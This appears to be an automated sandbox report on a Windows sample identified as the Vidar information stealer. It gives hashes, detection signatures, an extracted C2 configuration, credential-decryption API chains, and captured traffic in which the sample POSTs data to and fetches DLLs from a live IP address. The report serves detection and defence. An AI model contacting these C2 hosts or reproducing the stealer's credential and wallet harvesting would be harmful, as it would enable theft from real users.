Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1482922
MD5: bea49eab907af8ad2cbea9bfb807aae2
SHA1: 8efec66e57e052d6392c5cbb7667d1b49e88116e
SHA256: 9b645f570116d3e10faa316981e4fcde6fe55417feced3385cfbb815c7df8707
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Contains functionality to inject code into remote processes
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: https://5.75.212.60/vcruntime140.dll; Avira URL Cloud: Label: malware
Source: https://5.75.212.60/sqls.dll Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/badges Avira URL Cloud: Label: malware
Source: https://5.75.212.60/0 Avira URL Cloud: Label: malware
Source: https://5.75.212.60// Avira URL Cloud: Label: malware
Source: https://banana.incognet.io/ Avira URL Cloud: Label: malware
Source: https://5.75.212.60/# Avira URL Cloud: Label: malware
Source: https://5.75.212.60/; Avira URL Cloud: Label: malware
Source: https://5.75.212.60/A Avira URL Cloud: Label: malware
Source: https://t.me/armad2a Avira URL Cloud: Label: malware
Source: https://5.75.212.60/4 Avira URL Cloud: Label: malware
Source: https://5.75.212.60/5 Avira URL Cloud: Label: malware
Source: https://5.75.212.60/2 Avira URL Cloud: Label: malware
Source: https://5.75.212.60/6 Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dllnXq Avira URL Cloud: Label: malware
Source: https://5.75.212.60/H Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259 Avira URL Cloud: Label: malware
Source: https://5.75.212.60/EGIDHDHIDG Avira URL Cloud: Label: malware
Source: https://5.75.212.60/e Avira URL Cloud: Label: malware
Source: https://5.75.212.60/licies Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dll Avira URL Cloud: Label: malware
Source: https://5.75.212.60/freebl3.dllE Avira URL Cloud: Label: malware
Source: 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "e0c99e9ff0b95355e8ec19c548ab0f83"}
Source: arpdabl.zapto.org Virustotal: Detection: 11%
Source: https://5.75.212.60/sqls.dll Virustotal: Detection: 11%
Source: https://5.75.212.60// Virustotal: Detection: 11%
Source: https://5.75.212.60/0 Virustotal: Detection: 5%
Source: https://5.75.212.60/# Virustotal: Detection: 11%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00406D50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00406CD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00410DF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA, 0_2_00408980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7F6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C7F6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C94A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C94A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9444C0 PK11_PubEncrypt, 0_2_6C9444C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C914420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C914420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C944440 PK11_PrivDecrypt, 0_2_6C944440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C9925B0

Compliance

Source: C:\ProgramData\BFCAAEHJDB.exe Unpacked PE file: 6.2.BFCAAEHJDB.exe.3370000.2.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe File created: C:\Users\user\AppData\Local\Temp\installer.log
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RfxVmt.pdb source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: RfxVmt.pdbGCTL source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA3896DF3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree, 23_2_00007FFDA3896DF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA3896DAF NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree, 23_2_00007FFDA3896DAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401110
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_004099F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040A2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_004156C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040C2E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00415EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 0_2_00414F80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00409D40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00415A70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040AAB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF6209447F3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FF6209447F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA389A0D3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDA389A0D3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38C1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDA38C1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0A5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC0A5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0D5803 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC0D5803
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0F5253 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC0F5253
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC122FE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 0_2_004153C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199747278259
Source: global traffic TCP traffic: 45.8.98.78 ports 19063,0,1,3,6,9
Source: global traffic TCP traffic: 204.8.84.94 ports 20578,0,2,5,7,8
Source: global traffic TCP traffic: 68.148.96.106 ports 12385,1,2,3,5,8
Source: global traffic TCP traffic: 82.165.57.155 ports 27813,1,2,3,7,8
Source: global traffic TCP traffic: 68.53.161.168 ports 13749,1,3,4,7,9
Source: global traffic TCP traffic: 73.62.1.179 ports 17850,0,1,5,7,8
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: KXEmxT2p.23.dr String found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/
Source: unknown Network traffic detected: IP country count 12
Source: global traffic TCP traffic: 192.168.2.6:49745 -> 91.92.250.213:1110
Source: global traffic TCP traffic: 192.168.2.6:49758 -> 91.224.234.189:50444
Source: global traffic TCP traffic: 192.168.2.6:49759 -> 81.6.45.56:33834
Source: global traffic TCP traffic: 192.168.2.6:49760 -> 99.252.52.199:17541
Source: global traffic TCP traffic: 192.168.2.6:49761 -> 68.148.96.106:12385
Source: global traffic TCP traffic: 192.168.2.6:49762 -> 209.99.203.131:34320
Source: global traffic TCP traffic: 192.168.2.6:49763 -> 70.18.38.5:28737
Source: global traffic TCP traffic: 192.168.2.6:49764 -> 73.62.1.179:17850
Source: global traffic TCP traffic: 192.168.2.6:49765 -> 45.8.98.78:19063
Source: global traffic TCP traffic: 192.168.2.6:49766 -> 184.185.247.130:9859
Source: global traffic TCP traffic: 192.168.2.6:49767 -> 82.165.57.155:27813
Source: global traffic TCP traffic: 192.168.2.6:49768 -> 204.8.84.94:20578
Source: global traffic TCP traffic: 192.168.2.6:49769 -> 5.64.137.68:11737
Source: global traffic TCP traffic: 192.168.2.6:49770 -> 24.92.16.253:16063
Source: global traffic TCP traffic: 192.168.2.6:49771 -> 91.149.237.69:26412
Source: global traffic TCP traffic: 192.168.2.6:49772 -> 68.119.203.48:9756
Source: global traffic TCP traffic: 192.168.2.6:49773 -> 68.53.161.168:13749
Source: global traffic TCP traffic: 192.168.2.6:49774 -> 119.13.124.67:29762
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 95.165.139.85:43117
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 194.87.219.156:19047
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 75.97.173.28:14634
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 73.38.186.219:20033
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 173.230.128.232:26930
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 130.185.251.21:18735
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 67.166.47.100:15536
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 186.28.6.171:15230
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 91.194.11.174:19248
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 139.59.20.27:14719
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 24.124.34.93:27057
Source: global traffic UDP traffic: 192.168.2.6:14604 -> 216.9.179.60:25750
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Wed, 24 Jul 2024 07:28:22 GMTAccept-Ranges: bytesETag: "40ef51109bddda1:0"Server: Microsoft-IIS/10.0Date: Fri, 26 Jul 2024 09:27:04 GMTContent-Length: 11989504
Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 23.192.247.89 23.192.247.89
Source: Joe Sandbox View IP Address: 77.91.101.71 77.91.101.71
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Content-Length: 7901 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 5.75.212.60 | Connection: Keep-Alive | Cache-Control: no-cache
